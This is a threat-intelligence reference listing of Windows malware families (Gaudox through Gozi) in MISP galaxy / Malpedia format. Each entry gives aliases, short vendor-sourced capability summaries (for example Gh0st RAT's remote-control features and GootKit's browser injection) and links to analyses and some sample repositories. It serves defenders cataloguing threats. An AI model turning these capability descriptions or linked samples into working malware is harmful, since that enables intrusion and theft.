The tag is: misp-galaxy:malpedia="Gaudox"

Gaudox is also known as:

Table 3545. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.gaudox

http://nettoolz.blogspot.ch/2016/03/gaudox-http-bot-1101-casm-ring3-rootkit.html

Gdrive

According to Unit 42, this is a .NET X64 malware that is capable of interaction with GoogleDrive, allowing an attacker to have victim information uploaded and payloads delivered.

The tag is: misp-galaxy:malpedia="Gdrive"

Gdrive is also known as:

  • DoomDrive

  • GoogleDriveSucks

Table 3550. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.gdrive

https://r136a1.info/2022/07/19/a-look-into-apt29s-new-early-stage-google-drive-downloader/

https://unit42.paloaltonetworks.com/cloaked-ursa-online-storage-services-campaigns/

https://services.google.com/fh/files/blogs/gcat_threathorizons_full_apr2023.pdf

GearInformer

The tag is: misp-galaxy:malpedia="GearInformer"

GearInformer is also known as:

Table 3551. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.gearinformer

https://wapacklabs.blogspot.ch/2017/02/rebranding-ispy-keylogger-gear-informer.html

GEARSHIFT

According to FireEye, GEARSHIFT is a memory-only dropper for two keylogger DLLs. It is designed to replace a legitimate Fax Service DLL.

The tag is: misp-galaxy:malpedia="GEARSHIFT"

GEARSHIFT is also known as:

Table 3552. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.gearshift

https://content.fireeye.com/apt-41/rpt-apt41/

GEMCUTTER

According to FireEye, GEMCUTTER is used in a similar capacity as BACKBEND (downloader), but maintains persistence by creating a Windows registry run key. GEMCUTTER checks for the presence of the mutex MicrosoftGMMZJ to ensure only one copy of GEMCUTTER is executing. If the mutex doesn’t exist, the malware creates it and continues execution; otherwise, the malware signals the MicrosoftGMMExit event.

The tag is: misp-galaxy:malpedia="GEMCUTTER"

GEMCUTTER is also known as:

Table 3553. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.gemcutter

https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf

GeminiDuke

The tag is: misp-galaxy:malpedia="GeminiDuke"

GeminiDuke is also known as:

Table 3554. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.geminiduke

https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf

Get2

The tag is: misp-galaxy:malpedia="Get2"

Get2 is also known as:

  • FRIENDSPEAK

  • GetandGo

Table 3555. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.get2

https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf

https://github.com/Tera0017/TAFOF-Unpacker

https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/cybercriminal%20groups/TA505/04-10-2019/Malware%20Analysis%2004-10-2019.md

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf

https://blog.fox-it.com/2020/11/16/ta505-a-brief-history-of-their-time/

https://www.goggleheadedhacker.com/blog/post/13

https://elis531989.medium.com/funtastic-packers-and-where-to-find-them-41429a7ef9a7

https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf

https://www.secureworks.com/research/threat-profiles/gold-tahoe

https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader

https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update

https://intel471.com/blog/ta505-get2-loader-malware-december-2020/

https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-returns-with-a-new-bag-of-tricks-602104

https://www.telekom.com/en/blog/group/article/eager-beaver-a-short-overview-of-the-restless-threat-actor-ta505-609546

https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf

https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/

https://blog.intel471.com/2020/07/15/flowspec-ta505s-bulletproof-hoster-of-choice/

https://www.telekom.com/en/blog/group/article/inside-of-cl0p-s-ransomware-operation-615824

https://www.hornetsecurity.com/en/security-information/clop-clop-ta505-html-malspam-analysis/

https://intel471.com/blog/a-brief-history-of-ta505

get_pwd

The tag is: misp-galaxy:malpedia="get_pwd"

get_pwd is also known as:

Table 3558. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.get_pwd

https://ihonker.org/thread-1504-1-1.html

Gh0stBins

The tag is: misp-galaxy:malpedia="Gh0stBins"

Gh0stBins is also known as:

  • Gh0stBins RAT

Table 3559. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.gh0stbins

https://any.run/cybersecurity-blog/gh0stbins-chinese-rat-malware-analysis/

Gh0stTimes

Custom RAT developed by the BlackTech actor, based on the Gh0st RAT.

The tag is: misp-galaxy:malpedia="Gh0stTimes"

Gh0stTimes is also known as:

Table 3560. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.gh0sttimes

https://jp.security.ntt/resources/EN-BlackTech_2021.pdf

https://blogs.jpcert.or.jp/en/2021/10/gh0sttimes.html

https://www.youtube.com/watch?v=uakw2HMGZ-I

GHAMBAR

According to Mandiant, GHAMBAR is a remote administration tool (RAT) that communicates with its C2 server using SOAP requests over HTTP. Its capabilities include filesystem manipulation, file upload and download, shell command execution, keylogging, screen capture, clipboard monitoring, and additional plugin execution.

The tag is: misp-galaxy:malpedia="GHAMBAR"

GHAMBAR is also known as:

Table 3561. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ghambar

https://www.mandiant.com/media/17826

https://socradar.io/dark-web-profile-apt42-iranian-cyber-espionage-group/

GhostLocker

The tag is: misp-galaxy:malpedia="GhostLocker"

GhostLocker is also known as:

Table 3566. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ghost_locker

https://www.uptycs.com/blog/ghostlocker-ransomware-ghostsec

Ghost RAT

According to Security Ninja, Gh0st RAT (Remote Access Terminal) is a trojan “Remote Access Tool” used on Windows platforms, and has been used to hack into some of the most sensitive computer networks on Earth.

Below is a list of Gh0st RAT capabilities. Take full control of the remote screen on the infected bot. Provide real time as well as offline keystroke logging. Provide live feed of webcam, microphone of infected host. Download remote binaries on the infected remote host. Take control of remote shutdown and reboot of host. Disable infected computer remote pointer and keyboard input. Enter into shell of remote infected host with full control. Provide a list of all the active processes. Clear all existing SSDT of all existing hooks.

The tag is: misp-galaxy:malpedia="Ghost RAT"

Ghost RAT is also known as:

  • Farfli

  • Gh0st RAT

  • PCRat

Table 3567. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ghost_rat

https://www.intezer.com/blog/malware-analysis/chinaz-relations/

https://attack.mitre.org/groups/G0096

https://blogs.jpcert.or.jp/en/2021/10/gh0sttimes.html

https://documents.trendmicro.com/assets/Appendix_Water-Pamola-Attacked-Online-Shops-Via-Malicious-Orders.pdf

http://download01.norman.no/documents/ThemanyfacesofGh0stRat.pdf

https://blog.prevailion.com/2020/06/the-gh0st-remains-same8.html

https://hackcon.org/uploads/327/05%20-%20Kwak.pdf

https://www.fortinet.com/blog/threat-research/deep-panda-log4shell-fire-chili-rootkits

https://documents.trendmicro.com/assets/white_papers/wp-operation-earth-berberoka.pdf

https://blogs.blackberry.com/en/2021/10/drawing-a-dragon-connecting-the-dots-to-find-apt41

https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf

https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf

https://cofense.com/blog/open-source-gh0st-rat-still-haunting-inboxes-15-years-after-release/

https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/

https://labs.bitdefender.com/2018/02/operation-pzchao-a-possible-return-of-the-iron-tiger-apt/

https://www.bitdefender.com/files/News/CaseStudies/study/185/Bitdefender-Business-2017-WhitePaper-PZCHAO-crea2452-en-EN-GenericUse.pdf

https://raw.githubusercontent.com/yt0ng/cracking_softcell/main/Cracking_SOFTCLL_TLP_WHITE.pdf

https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/

https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/sophoslabs-cloud-snooper-report.pdf

https://s.tencent.com/research/report/836.html

https://asec.ahnlab.com/en/32572/

https://www.nttsecurity.com/docs/librariesprovider3/default-document-library/craftypanda-analysis-report

https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols

https://blog.cylance.com/the-ghost-dragon

https://attack.mitre.org/groups/G0001/

https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/april/decoding-network-data-from-a-gh0st-rat-variant/

https://www.trendmicro.com/en_us/research/21/l/collecting-in-the-dark-tropic-trooper-targets-transportation-and-government-organizations.html

https://risky.biz/whatiswinnti/

https://tccontre.blogspot.com/2021/02/gh0strat-anti-debugging-nested-seh-try.html

https://web.archive.org/web/20170311192337/http://download01.norman.no:80/documents/ThemanyfacesofGh0stRat.pdf

https://www.prevailion.com/the-gh0st-remains-the-same-2/

https://st.drweb.com/static/new-www/news/2021/april/drweb_research_attacks_on_russian_research_institutes_en.pdf

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/covid-19-and-new-year-greetings-the-higaisa-group/

https://www.intezer.com/blog-chinaz-relations/

https://web.archive.org/web/20140816135909/https://www.symantec.com/connect/blogs/inside-back-door-attack

https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf

https://www.secureworks.com/research/threat-profiles/bronze-fleetwood

https://www.youtube.com/watch?v=uakw2HMGZ-I

https://us-cert.cisa.gov/ncas/alerts/aa20-345a

https://www.seqrite.com/blog/rat-used-by-chinese-cyberspies-infiltrating-indian-businesses/

https://research.nccgroup.com/2018/04/17/decoding-network-data-from-a-gh0st-rat-variant/

https://www.secureworks.com/research/threat-profiles/bronze-globe

https://st.drweb.com/static/new-www/news/2020/october/Study_of_the_ShadowPad_APT_backdoor_and_its_relation_to_PlugX_en.pdf

http://www.hexblog.com/?p=1248

https://attack.mitre.org/groups/G0011

https://blog.talosintelligence.com/2019/09/panda-evolution.html

https://unit42.paloaltonetworks.com/atoms/iron-taurus/

https://www.proofpoint.com/us/threat-insight/post/north-korea-bitten-bitcoin-bug-financially-motivated-campaigns-reveal-new

https://www.secureworks.com/research/threat-profiles/bronze-union

https://attack.mitre.org/groups/G0026

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/webworm-espionage-rats

https://www.trendmicro.com/en_us/research/22/d/new-apt-group-earth-berberoka-targets-gambling-websites-with-old.html

https://www.welivesecurity.com/2021/02/01/operation-nightscout-supply-chain-attack-online-gaming-asia/

https://www.cisecurity.org/insights/blog/top-10-malware-march-2022

https://thehackernews.com/2022/04/chinese-hackers-target-vmware-horizon.html

https://blog.talosintelligence.com/2022/02/threat-roundup-0204-0211.html

https://labs.bitdefender.com/wp-content/uploads/downloads/operation-pzchao-inside-a-highly-specialized-espionage-infrastructure/

https://medium.com/insomniacs/what-happened-between-the-bigbadwolf-and-the-tiger-925549a105b2

https://www.secureworks.com/research/threat-profiles/bronze-edison

http://www.malware-traffic-analysis.net/2018/01/04/index.html

https://www.trendmicro.com/en_us/research/21/d/water-pamola-attacked-online-shops-via-malicious-orders.html

https://blog.bushidotoken.net/2020/06/deep-dive-darkhotel-apt.html

https://decoded.avast.io/luigicamastra/apt-group-planted-backdoors-targeting-high-profile-networks-in-central-asia

https://www.datanet.co.kr/news/articleView.html?idxno=133346

http://www.nartv.org/mirror/ghostnet.pdf

https://www.secureworks.com/research/a-peek-into-bronze-unions-toolbox

Gibberish

Ransomware.

The tag is: misp-galaxy:malpedia="Gibberish"

Gibberish is also known as:

Table 3569. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.gibberish

https://id-ransomware.blogspot.com/2020/02/gibberish-ransomware.html

Giffy

The tag is: misp-galaxy:malpedia="Giffy"

Giffy is also known as:

Table 3570. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.giffy

https://vx-underground.org/archive/APTs/2016/2016.09.06/Buckeye.pdf

Glasses

The tag is: misp-galaxy:malpedia="Glasses"

Glasses is also known as:

  • Wordpress Bruteforcer

Table 3574. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.glasses

GlitchPOS

The tag is: misp-galaxy:malpedia="GlitchPOS"

GlitchPOS is also known as:

Table 3576. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.glitch_pos

https://blog.talosintelligence.com/2019/03/glitchpos-new-pos-malware-for-sale.html

GlobeImposter

GlobeImposter is a ransomware application which is mainly distributed via "blank slate" spam (the spam has no message content and an attached ZIP file), exploits, malicious advertising, fake updates, and repacked installers. GlobeImposter mimics the Globe ransomware family. This malware may prevent execution of Anti-Virus solutions and other OS related security features and may prevent system restoration.

The tag is: misp-galaxy:malpedia="GlobeImposter"

GlobeImposter is also known as:

  • Fake Globe

Table 3577. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.globeimposter

https://blog.360totalsecurity.com/en/globeimposter-which-has-more-than-20-variants-is-still-wildly-growing/

https://www.acronis.com/en-us/blog/posts/globeimposter-ransomware-holiday-gift-necurs-botnet

https://go.group-ib.com/rs/689-LRE-818/images/Group-IB_Ransomware_whitepaper_eng.pdf

https://asec.ahnlab.com/en/48940/

https://www.secureworks.com/research/threat-profiles/gold-swathmore

https://www.emsisoft.com/ransomware-decryption-tools/globeimposter

https://isc.sans.edu/diary/23417

https://www.crowdstrike.com/blog/ransomware-preparedness-a-call-to-action/

https://www.sentinelone.com/blog/recent-tzw-campaigns-revealed-as-part-of-globeimposter-malware-family/

https://blog.fortinet.com/2017/08/05/analysis-of-new-globeimposter-ransomware-variant

https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf

https://www.bleepingcomputer.com/news/security/new-doc-globeimposter-ransomware-variant-malspam-campaign-underway/

https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much

https://info.phishlabs.com/blog/globe-imposter-ransomware-makes-a-new-run

https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf

https://www.youtube.com/watch?v=LUxOcpIRxmg

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf

https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/

https://blog.ensilo.com/globeimposter-ransomware-technical

https://asec.ahnlab.com/ko/30284/

https://intel471.com/blog/a-brief-history-of-ta505

Globe

The tag is: misp-galaxy:malpedia="Globe"

Globe is also known as:

Table 3578. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.globe_ransom

Glupteba

Glupteba is a trojan horse malware that is one of the top ten malware variants of 2021. After infecting a system, the Glupteba malware can be used to deliver additional malware, steal user authentication information, and enroll the infected system in a cryptomining botnet.

The tag is: misp-galaxy:malpedia="Glupteba"

Glupteba is also known as:

Table 3580. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.glupteba

https://habr.com/ru/company/solarsecurity/blog/578900/

https://www.welivesecurity.com/2014/03/18/operation-windigo-the-vivisection-of-a-large-linux-server-side-credential-stealing-malware-campaign/

https://www.bitdefender.com/files/News/CaseStudies/study/400/Bitdefender-PR-Whitepaper-MosaicLoader-creat5540-en-EN.pdf

https://www.domaintools.com/resources/blog/identifying-network-infrastructure-related-to-a-who-spoofing-campaign

https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf

https://decoded.avast.io/martinhron/meris-and-trickbot-standing-on-the-shoulders-of-giants/

https://medium.com/csis-techblog/installcapital-when-adware-becomes-pay-per-install-cyber-crime-15516249a451

https://news.sophos.com/en-us/2020/06/24/glupteba-report/?cmp=30728

https://blog.chainalysis.com/reports/2022-crypto-crime-report-preview-malware/

https://blog.trendmicro.com/trendlabs-security-intelligence/glupteba-campaign-hits-network-routers-and-updates-cc-servers-with-data-from-bitcoin-transactions/

https://cocomelonc.github.io/malware/2023/06/19/malware-av-evasion-17.html

https://storage.googleapis.com/gweb-uniblog-publish-prod/documents/1_Complaint.pdf

https://dissectingmalwa.re/the-blame-game-about-false-flags-and-overwritten-mbrs.html

https://blog.google/threat-analysis-group/disrupting-glupteba-operation/

http://resources.infosecinstitute.com/tdss4-part-1/

https://thehackernews.com/2022/03/over-200000-microtik-routers-worldwide.html

https://labs.k7computing.com/?p=22319

https://www.welivesecurity.com/2018/03/22/glupteba-no-longer-windigo/

https://community.riskiq.com/article/2a36a7d2/description

https://blog.google/technology/safety-security/new-action-combat-cyber-crime/

https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/

https://nakedsecurity.sophos.com/2020/06/24/glupteba-the-bot-that-gets-secret-messages-from-the-bitcoin-blockchain/

https://www.trendmicro.com/en_us/research/21/j/ransomware-operators-found-using-new-franchise-business-model.html

https://www.nozominetworks.com/blog/tracking-malicious-glupteba-activity-through-the-blockchain/

https://www.welivesecurity.com/2011/03/02/tdl4-and-glubteba-piggyback-piggybugs/

https://krebsonsecurity.com/2022/06/the-link-between-awm-proxy-the-glupteba-botnet/?utm_source=dlvr.it&utm_medium=twitter

GoBotKR

The tag is: misp-galaxy:malpedia="GoBotKR"

GoBotKR is also known as:

Table 3581. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.gobotkr

https://www.welivesecurity.com/2019/07/08/south-korean-users-backdoor-torrents/

goDoH

Proof of concept for data exfiltration via DoH, written in Go.

The tag is: misp-galaxy:malpedia="goDoH"

goDoH is also known as:

Table 3584. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.godoh

https://sensepost.com/blog/2018/waiting-for-godoh/

https://github.com/sensepost/goDoH

Godzilla Loader

The tag is: misp-galaxy:malpedia="Godzilla Loader"

Godzilla Loader is also known as:

Table 3585. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.godzilla_loader

https://research.checkpoint.com/godzilla-loader-and-the-long-tail-of-malware/

Gofing

A file infector written in Go, discovered by Karsten Hahn in February 2022. According to Karsten, despite its internal naming, it is not polymorphic and the virus body is not encrypted. Gofing uses the Coldfire Golang malware development library.

The tag is: misp-galaxy:malpedia="Gofing"

Gofing is also known as:

  • Velocity Polymorphic Compression Malware

Table 3586. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.gofing

https://twitter.com/struppigel/status/1498229809675214849

GoGoogle

The tag is: misp-galaxy:malpedia="GoGoogle"

GoGoogle is also known as:

  • BossiTossi

Table 3588. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.gogoogle

https://labs.bitdefender.com/2020/05/gogoogle-decryption-tool/

GoldenSpy

According securityweek, GoldenSpy, the malware was observed as part of a campaign that supposedly started in April 2020, but some of the identified samples suggest the threat has been around since at least December 2016.

One of the compromised organizations, a global technology vendor that conducts government business in the US, Australia and UK, and which recently opened offices in China, became infected after installing “Intelligent Tax,” a piece of software from the Golden Tax Department of Aisino Corporation, which a local bank required for paying local taxes.

Although it worked as advertised, the software was found to install a hidden backdoor to provide remote operators with the possibility to execute Windows commands or upload and run files.

The tag is: misp-galaxy:malpedia="GoldenSpy"

GoldenSpy is also known as:

Table 3592. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.goldenspy

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/goldenspy-chapter-3-new-and-improved-uninstaller/

https://www.ic3.gov/Media/News/2020/201103-1.pdf

https://www.atlanticcouncil.org/wp-content/uploads/2020/07/Breaking-trust-Shades-of-crisis-across-an-insecure-software-supply-chain.pdf

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/goldenspy-chapter-4-goldenhelper-malware-embedded-in-official-golden-tax-software/

https://trustwave.azureedge.net/media/16908/the-golden-tax-department-and-emergence-of-goldenspy-malware.pdf

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/the-golden-tax-department-and-the-emergence-of-goldenspy-malware/

https://www.bka.de/SharedDocs/Downloads/DE/IhreSicherheit/Warnhinweise/WarnhinweisGOLDENSPY.pdf

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/goldenspy-chapter-two-the-uninstaller/

https://www.ic3.gov/media/news/2020/200728.pdf

GoldMax

Gold Max is a Golang written command and control backdoor used by the NOBELIUM threat actor group. It uses several different techniques to obfuscate its actions and evade detection. The malware writes an encrypted configuration file to disk, where the file name and AES-256 cipher keys are unique per implant and based on environmental variables and information about the network where it is running.

The tag is: misp-galaxy:malpedia="GoldMax"

GoldMax is also known as:

  • SUNSHUTTLE

Table 3593. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.goldmax

https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-backdoors-rats-loaders-evasion-techniques

https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/

https://www.cisa.gov/uscert/ncas/alerts/aa22-110a

https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf

https://x0r19x91.gitlab.io/post/malware-analysis/sunshuttle/

https://securelist.com/it-threat-evolution-q2-2023/110355/

https://us-cert.cisa.gov/ncas/analysis-reports/ar21-105a

https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/

https://securelist.com/extracting-type-information-from-go-binaries/104715/

https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/

https://www.youtube.com/watch?v=koZkHEJqPrU

https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf

GoldDragon

GoldDragon was a second-stage backdoor which established a permanent presence on the victim’s system once the first-stage, file-less, PowerShell-based attack leveraging steganography was executed. The initial attack was observed first in December 2017, when a Korean-language spear phishing campaing targeted organizations linked with Pyeongchang Winter Olympics 2018. GoldDragon was delivered once the attacker had gained an initial foothold in the targeted environment.

The malware was capable of a basic reconnaissance, data exfiltration and downloading of additional components from its C&C server.

The tag is: misp-galaxy:malpedia="GoldDragon"

GoldDragon is also known as:

  • Lovexxx

Table 3594. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.gold_dragon

https://asec.ahnlab.com/en/31089/

https://www.youtube.com/watch?v=rfzmHjZX70s

https://blog.talosintelligence.com/2021/11/kimsuky-abuses-blogs-delivers-malware.html

https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite

https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Kuo-We-Are-About-To-Land-How-CloudDragon-Turns-A-Nightmare-Into-Reality.pdf

GoMet

The tag is: misp-galaxy:malpedia="GoMet"

GoMet is also known as:

Table 3596. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.gomet

https://blog.talosintelligence.com/2022/07/attackers-target-ukraine-using-gomet.html

Gomorrah stealer

Gomorrah is a stealer with no or little obfuscation that appeared around March 2020. It is sold for about 150$ lifetime for v4 (originally 400$ for v3) or 100$ per month by its developer called "th3darkly / lucifer" (which is also the developer of CosaNostra botnet). The malware’s main functionalities are stealing (passwords, cryptocurrency wallets) and loading of tasks and other payloads.

The tag is: misp-galaxy:malpedia="Gomorrah stealer"

Gomorrah stealer is also known as:

Table 3597. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.gomorrah_stealer

https://twitter.com/vxunderground/status/1469713783308357633

https://github.com/jstrosch/malware-samples/tree/master/binaries/gomorrah/2020/April

GoogleDrive RAT

The tag is: misp-galaxy:malpedia="GoogleDrive RAT"

GoogleDrive RAT is also known as:

Table 3599. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.google_drive_rat

https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018b.pdf

GootKit

Gootkit is a banking trojan consisting of an x86 loader and a payload embedding nodejs as well as a set of js scripts. The loader downloads the payload, stores it in registry and injects it in a copy of the loader process. The loader also contains two encrypted DLLs intended to be injected into each browser process launched in order to place the payload in man in the browser and allow it to apply the webinjects received from the command and control server on HTTPx exchanges. This allows Gootkit to intercept HTTPx requests and responses, steal their content or modify it according to the webinjects.

The tag is: misp-galaxy:malpedia="GootKit"

GootKit is also known as:

  • Waldek

  • Xswkit

  • talalpek

Table 3601. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.gootkit

https://www.sentinelone.com/blog/gootkit-banking-trojan-persistence-other-capabilities/

https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/master/Delivery/Gootkit-malware.md

http://www.vkremez.com/2018/04/lets-learn-in-depth-dive-into-gootkit.html

https://dissectingmalwa.re/nicht-so-goot-breaking-down-gootkit-and-jasper-ftcode.html

https://news.drweb.com/show/?i=4338&lng=en

https://www.sentinelone.com/blog/gootkit-banking-trojan-deep-dive-anti-analysis-features/

https://www.s21sec.com/en/blog/2016/05/reverse-engineering-gootkit/

https://www.youtube.com/watch?v=242Tn0IL2jE

https://securelist.com/blog/research/76433/inside-the-gootkit-cc-server/

https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf

https://resource.redcanary.com/rs/003-YRU-314/images/2022_ThreatDetectionReport_RedCanary.pdf

https://www.certego.net/en/news/malware-tales-gootkit/

http://blog.cert.societegenerale.com/2015/04/analyzing-gootkits-persistence-mechanism.html

http://blog.trendmicro.com/trendlabs-security-intelligence/fake-judicial-spam-leads-to-backdoor-with-fake-certificate-authority/

https://forums.juniper.net/t5/Security-Now/New-Gootkit-Banking-Trojan-variant-pushes-the-limits-on-evasive/ba-p/319055

https://dannyquist.github.io/gootkit-reversing-ghidra/

https://news.sophos.com/en-us/2021/03/01/gootloader-expands-its-payload-delivery-options/?cmp=30728

https://securityintelligence.com/gootkit-bobbing-and-weaving-to-avoid-prying-eyes/

https://blogs.blackberry.com/en/2020/04/threat-spotlight-gootkit-banking-trojan

https://www.youtube.com/watch?v=QgUlPvEE4aw

https://www.trendmicro.com/en_us/research/20/l/investigating-the-gootkit-loader.html

https://www.us-cert.gov/ncas/alerts/TA16-336A

https://labs.sentinelone.com/gootkit-banking-trojan-deep-dive-anti-analysis-features/

https://blog.malwarebytes.com/threat-analysis/2020/11/german-users-targeted-with-gootkit-banker-or-revil-ransomware/

https://securelist.com/gootkit-the-cautious-trojan/102731/

https://blogs.blackberry.com/en/2021/11/revil-under-the-microscope

https://www.trendmicro.com/en_us/research/23/a/gootkit-loader-actively-targets-the-australian-healthcare-indust.html

https://www.trendmicro.com/en_us/research/22/g/gootkit-loaders-updated-tactics-and-fileless-delivery-of-cobalt-strike.html

https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware

https://twitter.com/MsftSecIntel/status/1366542130731094021

https://twitter.com/jhencinski/status/1464268732096815105

https://securityintelligence.com/gootkit-developers-dress-it-up-with-web-traffic-proxy/

https://5556002.fs1.hubspotusercontent-na1.net/hubfs/5556002/2022%20PDF%20Download%20Assets/ADA%20Compliant%20pdfs/Reports/PUBLIC_Gootloader%20-%20Foreign%20Intelligence%20Service.pdf

https://www.f5.com/labs/articles/threat-intelligence/tackling-gootkit-s-traps

https://connect.ed-diamond.com/MISC/MISC-100/Analyse-du-malware-bancaire-Gootkit-et-de-ses-mecanismes-de-protection

https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/

GOTROJ

The tag is: misp-galaxy:malpedia="GOTROJ"

GOTROJ is also known as:

Table 3604. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.gotroj

https://www.rsa.com/content/dam/en/white-paper/the-shadows-of-ghosts-carbanak-report.pdf

GovRAT

The tag is: misp-galaxy:malpedia="GovRAT"

GovRAT is also known as:

Table 3605. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.govrat

https://www.yumpu.com/en/document/view/55930175/govrat-v20

Gozi

2000 Ursnif aka Snifula 2006 Gozi v1.0, Gozi CRM, CRM, Papras 2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*) → 2010 Gozi Prinimalka → Vawtrak/Neverquest

In 2006, Gozi v1.0 ('Gozi CRM' aka 'CRM') aka Papras was first observed. It was offered as a CaaS, known as 76Service. This first version of Gozi was developed by Nikita Kurmin, and he borrowed code from Ursnif aka Snifula, a spyware developed by Alexey Ivanov around 2000, and some other kits. Gozi v1.0 thus had a formgrabber module and often is classified as Ursnif aka Snifula.

In September 2010, the source code of a particular Gozi CRM dll version was leaked, which led to Vawtrak/Neverquest (in combination with Pony) via Gozi Prinimalka (a slightly modified Gozi v1.0) and Gozi v2.0 (aka 'Gozi ISFB' aka 'ISFB' aka Pandemyia). This version came with a webinject module.

The tag is: misp-galaxy:malpedia="Gozi"

Gozi is also known as:

  • CRM

  • Gozi CRM

  • Papras

  • Snifula

  • Ursnif

Table 3606. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.gozi

https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree

https://www.secureworks.com/research/gozi

https://blog.gdatasoftware.com/2016/11/29325-analysis-ursnif-spying-on-your-data-since-2007

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/

https://www.secureworks.com/research/threat-profiles/gold-swathmore

https://github.com/mlodic/ursnif_beacon_decryptor

https://0xtoxin.github.io/threat%20breakdown/Gozi-Italy-Campaign/

